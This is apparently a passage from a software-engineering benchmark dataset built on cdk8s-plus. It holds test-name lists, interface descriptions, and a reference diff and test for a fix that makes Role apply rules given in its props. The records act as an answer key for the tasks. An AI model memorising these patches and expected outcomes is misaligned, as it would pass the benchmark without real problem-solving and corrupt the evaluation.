and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", 
"can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim 
at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be 
separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable 
service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a 
Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws 
on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a 
LoadBalancer type", "can be exposed by an ingress" ]
Enum: ContainerRestartPolicy Location: src/container.ts Inputs: NONE (enum definition) Outputs: Enum values – ALWAYS = 'Always' Description: Enum that defines the allowed restart policy for init containers (currently only “Always”). Used to set the `restartPolicy` field on a Container when it is an init container. Method: Pod.addInitContainer(opts: { image: string; restartPolicy?: ContainerRestartPolicy; ... }) Location: src/pod.ts (adds support for the `restartPolicy` option in init‑container specifications) Inputs: - `image` (string, required) – container image. - `restartPolicy` (optional, ContainerRestartPolicy) – if set, the init container’s restart policy; only `ALWAYS` is allowed. - other Container options (env, resources, etc.). Outputs: Returns the created `Container` instance representing the init container. Description: Adds an init container to the pod. The call now accepts an optional `restartPolicy` property which is stored on the underlying `Container` and rendered as `restartPolicy` in the synthesized manifest. Method: Pod.constructor(scope, id, props?: { containers?: Array<{ image: string; restartPolicy?: ContainerRestartPolicy; ... }> ; ... }) Location: src/pod.ts (validation added in the pod synthesis path) Inputs: - `containers` array where each element may include a `restartPolicy` field of type `ContainerRestartPolicy`. Outputs: Throws `Error` with message `Invalid container spec: <name> has non‑empty restartPolicy field. The field can only be specified for initContainers` if any regular container defines `restartPolicy`. Description: Constructs a Pod. During synthesis the constructor now validates that the `restartPolicy` field is **not** present on regular containers; it is only permitted on init containers. This validation is exercised by the test that expects synthesis to fail when a normal container specifies `restartPolicy`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 41, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/kubernetes/enhancements/tree/e1a916745378660bafb96cb3c9f754fa793342f9/keps/sig-node/753-sidecar-containers" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `restartPolicy` field to the Container API, limited to init containers, and includes a new snapshot test and a test asserting that the field on regular containers throws. The provided test changes align with these requirements: they import a new `ContainerRestartPolicy` enum, verify that the generated manifest contains the field for an init container, and assert an error for misuse. 
No test couplings, hidden dependencies, or ambiguous specifications are evident, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b8b295b81d6d0bde79567988b79523e6226086e0
2024-03-01 08:13:32
cdk8s-team__cdk8s-plus-3813
diff --git a/src/role.ts b/src/role.ts index 4615a2b6..f0fa773c 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps This fixes a bug where any rule given from roleProps is not used. the for loop exists for clusterRole but was missing on Role. a test is included to prevent breaking in future
**Title** Fix Role to honor permission rules supplied via role properties **Problem** When creating a Role, any policy rules passed through its configuration were ignored, leading to roles lacking the intended permissions. This discrepancy did not exist for ClusterRole, which correctly applied such rules. **Root Cause** The constructor for Role omitted the logic that iterates over the provided rule set and registers each rule with the role. **Fix / Expected Behavior** - Role now processes the list of rules supplied in its properties. - Each rule’s verbs and resources are added to the role’s policy. - When no rules are provided, the role behaves exactly as before. - Permission handling for Role matches the behavior of ClusterRole. - Added test guarantees that future changes will not regress this behavior. **Risk & Validation** - Verify that existing Role creations without explicit rules remain unaffected. - Ensure that duplicate rule handling and ordering remain consistent with prior implementation. - Run the full test suite, including the new test, to confirm correct rule application.
3,813
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can mutate metadata", "default configuration", "custom configuration", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a 
Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 
minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy 
that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can 
configure an immutable tls secret", "can configure an immutable docker config secret", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", 
\"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - 
default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a 
LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can 
allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions 
twice with same subject" ]
Method: Role(scope: Construct, id: string, props: RoleProps) Location: src/role.ts Inputs: - scope – the construct (e.g., a Chart) in which the Role is defined. - id – logical ID of the Role construct. - props – RoleProps object; may include an optional `rules` array where each rule has `verbs: string[]` and `resources: ApiResource[]` (e.g., `[kplus.ApiResource.PODS]`). Outputs: An instance of `kplus.Role` that is added to the chart; during synthesis the supplied `rules` are translated into Kubernetes Role manifest entries (`apiGroups`, `resources`, `verbs`). Description: Constructs a Kubernetes Role resource, now respecting any policy rules passed via `props.rules` by invoking `allow` for each rule, so that the synthesized manifest contains the expected access rules.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
